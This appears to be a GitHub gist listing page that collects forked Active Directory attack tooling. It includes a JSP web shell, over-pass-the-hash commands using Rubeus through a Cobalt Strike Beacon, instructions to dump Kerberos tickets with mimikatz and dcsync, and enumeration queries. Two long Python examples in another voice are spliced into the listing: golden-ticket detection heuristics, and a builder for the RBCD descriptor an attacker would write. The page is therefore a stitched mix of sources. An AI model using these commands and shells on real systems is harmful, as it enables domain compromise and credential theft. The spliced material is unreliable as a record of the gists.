

dev2null dev-2null

@dev-2null
dev-2null / New-SYSVOLZip.ps1
Created February 6, 2020 09:45 — forked from HarmJ0y/New-SYSVOLZip.ps1
Compresses all of SYSVOL to a local .zip file.
function New-SYSVOLZip {
<#
.SYNOPSIS
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
dev-2null / decryptKerbTicket.py
Created March 3, 2020 11:17 — forked from xan7r/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]
dev-2null / gist:78c36568aed5dca143d4166016bb259f
Created March 3, 2020 11:22 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
dev-2null / Get-KerberosTicketGrantingTicket.ps1
Created March 4, 2020 13:39 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
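The detection half of the gist works because a forged TGT is minted by the attacker rather than the KDC, so its fields need not agree with domain policy. The following added example (mine, not the gist's Pester tests) applies that idea to collected TGT records: lifetime and renewal window beyond the Default Domain Policy limits, an RC4 session key in an AES-only domain (the ticket was forged from the krbtgt NT hash), a client name with no account in the directory, and a realm mismatch. Field names mirror KERB_EXTERNAL_TICKET as the collection script returns them; the policy values, the known-user set and the ticket records are constructed, and in practice the user set comes from AD.

```python
"""Heuristic Golden Ticket checks over collected TGTs.

Added example, not the gist's Pester tests. Assumptions: records carry the
KERB_EXTERNAL_TICKET fields (ClientName, ServiceName, TargetDomainName,
StartTime, EndTime, RenewUntil, SessionKeyType); POLICY holds the Default
Domain Policy defaults; the known user set would come from AD in practice.
"""
from datetime import datetime, timedelta

RC4_HMAC, AES256_CTS = 23, 18      # Kerberos etype numbers

POLICY = {
    "realm": "LAB.LOCAL",
    "max_ticket_age": timedelta(hours=10),   # "Maximum lifetime for user ticket"
    "max_renew_age": timedelta(days=7),      # "Maximum lifetime for user ticket renewal"
    "aes_only": True,                        # every account has AES keys, RC4 never issued
    "known_users": {"alice", "bob", "svc_backup"},
}

def is_tgt(t):
    return t["ServiceName"].lower().startswith("krbtgt/")

def check_tgt(t, policy=POLICY):
    """Return the reasons this TGT looks forged (empty list = consistent with policy)."""
    reasons = []
    life = t["EndTime"] - t["StartTime"]
    if life > policy["max_ticket_age"]:
        reasons.append(f"lifetime {life} exceeds policy {policy['max_ticket_age']}")
    renew = t["RenewUntil"] - t["StartTime"]
    if renew > policy["max_renew_age"]:
        reasons.append(f"renewable for {renew}, policy allows {policy['max_renew_age']}")
    if policy["aes_only"] and t["SessionKeyType"] == RC4_HMAC:
        reasons.append("RC4 session key in an AES-only domain (ticket forged from the krbtgt NT hash?)")
    if t["ClientName"].lower() not in policy["known_users"]:
        reasons.append(f"client {t['ClientName']} has no account in the directory")
    if t["TargetDomainName"].upper() != policy["realm"]:
        reasons.append(f"realm {t['TargetDomainName']} is not {policy['realm']}")
    return reasons

def find_forged(tickets, policy=POLICY):
    """[(ClientName, reasons)] for every TGT in the collection that fails a check."""
    hits = []
    for t in tickets:
        if not is_tgt(t):                 # service tickets are out of scope here
            continue
        reasons = check_tgt(t, policy)
        if reasons:
            hits.append((t["ClientName"], reasons))
    return hits

# Constructed records in the shape the collection script returns.
T0 = datetime(2020, 3, 4, 13, 39)

def tgt(client, start, end, renew, etype, realm="LAB.LOCAL"):
    return {"ClientName": client, "DomainName": realm, "TargetDomainName": realm,
            "ServiceName": f"krbtgt/{realm}", "StartTime": start, "EndTime": end,
            "RenewUntil": renew, "SessionKeyType": etype}

SAMPLE_TGTS = [
    tgt("alice", T0, T0 + timedelta(hours=10), T0 + timedelta(days=7), AES256_CTS),        # KDC-issued
    tgt("fakeadmin", T0, T0 + timedelta(days=3650), T0 + timedelta(days=3650), RC4_HMAC),  # classic 10-year golden ticket
    tgt("svc_backup", T0, T0 + timedelta(hours=10), T0 + timedelta(days=7), RC4_HMAC),     # lifetimes tuned to policy, etype not
    {**tgt("bob", T0, T0 + timedelta(hours=1), T0 + timedelta(hours=1), AES256_CTS),
     "ServiceName": "cifs/fs01.lab.local"},                                               # service ticket, ignored
]

if __name__ == "__main__":
    for client, reasons in find_forged(SAMPLE_TGTS):
        print(client)
        for r in reasons:
            print("   ", r)
```

The third record is the caveat: current forging tools let the operator set the end and renew times to match policy, so the lifetime checks only catch lazy forgeries; the session key type and the existence of the client account are the checks that survive that, and even those fall to an attacker who forges with the AES256 krbtgt key for a real user.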
dev-2null / cmd.jsp
Created May 25, 2020 09:59 — forked from ErosLever/cmd.jsp
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
<form method="GET" action="">
<input type="text" name="cmd" />
<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
StringBuffer sb = new StringBuffer();
for(char c : str.toCharArray())
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
sb.append( c );
else
dev-2null / wmic_cmds.txt
Created November 3, 2020 14:23 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
dev-2null / Get-RBCD.ps1
Last active March 3, 2022 02:27
PowerShell one-liner to retrieve RBCD information with security descriptors resolved
([adsisearcher]::new(([adsi]"LDAP://OU=OU,DC=domain,DC=net"),"(msDS-AllowedToActOnBehalfOfOtherIdentity=*)")).FindAll()| ForEach-Object {$_.Properties["distinguishedname"]; ConvertFrom-SddlString (New-Object Security.AccessControl.RawSecurityDescriptor([byte[]]$_.Properties["msds-allowedtoactonbehalfofotheridentity"][0],0)).GetSddlForm([Security.AccessControl.AccessControlSections]::Access) | select DiscretionaryAcl|fl}
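The one-liner relies on ConvertFrom-SddlString, which only exists on Windows. When the attribute is pulled with a non-Windows LDAP client (ldap3, impacket) the raw bytes have to be decoded by hand, so the following added example (mine, not part of the gist) parses the self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity and lists the trustee SIDs allowed to act on behalf of other identities. It also builds such a blob, which is the audit's mirror image: the descriptor an attacker with write access to the computer object would set to grant themselves delegation. Layouts follow MS-DTYP (SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE, SID); the sample SIDs are constructed.

```python
"""Parse and build the self-relative security descriptor stored in
msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD).

Added example, independent of the PowerShell one-liner. Layouts follow MS-DTYP.
Assumptions: a DACL of ACCESS_ALLOWED_ACEs, the mask Set-ADComputer
-PrincipalsAllowedToDelegateToAccount writes, BUILTIN\\Administrators as owner;
the SIDs in the sample are constructed.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
RBCD_MASK = 0x000F01FF   # SDDL CCDCLCSWRPWPDTLOCRSDRCWDWO
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl

def sid_to_bytes(sid):
    _, rev, ida, *subs = sid.split("-")
    subs = [int(s) for s in subs]
    return bytes([int(rev), len(subs)]) + int(ida).to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)

def sid_from_bytes(buf, off):
    rev, n = buf[off], buf[off + 1]
    ida = int.from_bytes(buf[off + 2:off + 8], "big")      # IdentifierAuthority is big-endian
    subs = struct.unpack_from(f"<{n}I", buf, off + 8)       # SubAuthorities are little-endian
    return "S-%d-%d" % (rev, ida) + "".join("-%d" % s for s in subs), off + 8 + 4 * n

def build_rbcd_sd(allowed_sids, owner_sid="S-1-5-32-544"):
    """O:BA D:(A;;RBCD_MASK;;;sid)... as a self-relative blob laid out header | owner | DACL."""
    aces = b""
    for sid in allowed_sids:
        body = struct.pack("<I", RBCD_MASK) + sid_to_bytes(sid)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(owner_sid)
    hdr = struct.calcsize(SD_HEADER)
    control = SE_SELF_RELATIVE | SE_DACL_PRESENT
    return struct.pack(SD_HEADER, 1, 0, control, hdr, 0, 0, hdr + len(owner)) + owner + dacl

def parse_rbcd_sd(blob):
    """Return the owner SID and the trustees allowed to act on behalf of other identities."""
    rev, _, control, off_owner, _off_group, _off_sacl, off_dacl = struct.unpack_from(SD_HEADER, blob, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    owner = sid_from_bytes(blob, off_owner)[0] if off_owner else None
    trustees = []
    if control & SE_DACL_PRESENT and off_dacl:
        _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
        off = off_dacl + 8
        for _ in range(ace_count):
            ace_type, _flags, ace_size = struct.unpack_from("<BBH", blob, off)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                (mask,) = struct.unpack_from("<I", blob, off + 4)
                trustees.append({"sid": sid_from_bytes(blob, off + 8)[0], "mask": mask})
            off += ace_size          # AceSize lets unknown ACE types be skipped safely
    return {"owner": owner, "allowed_to_act": trustees}

# Constructed: a machine account (RID 1105) allowed to delegate to the target computer.
SAMPLE_SID = "S-1-5-21-1004336348-1177238915-682003330-1105"
SAMPLE_BLOB = build_rbcd_sd([SAMPLE_SID])

if __name__ == "__main__":
    sd = parse_rbcd_sd(SAMPLE_BLOB)
    print("owner:", sd["owner"])
    for t in sd["allowed_to_act"]:
        print("allowed to act: %s mask 0x%08X" % (t["sid"], t["mask"]))
```

Resolving the SIDs to accounts is a second LDAP query (objectSid=...), which is the part ConvertFrom-SddlString does for you on Windows; the interesting audit finding is a trustee that is not a server the computer is meant to front for, in particular a freshly created machine account.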
dev-2null / KDCProxy.ps1
Created February 18, 2022 07:56 — forked from jborean93/KDCProxy.ps1
Functions to help set up a KDC proxy server and add client proxy servers - https://syfuhs.net/kdc-proxy-for-remote-access
# Copyright: (c) 2022, Jordan Borean (@jborean93) <[email protected]>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
Function Install-KDCProxyServer {
<#
.SYNOPSIS
Set up a KDC Proxy server.
.DESCRIPTION
Sets up the KDC proxy server on the current host.
dev-2null / clr_via_native.c
Last active July 17, 2024 08:42 — forked from xpn/clr_via_native.c
A quick example showing how to load the CLR from native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;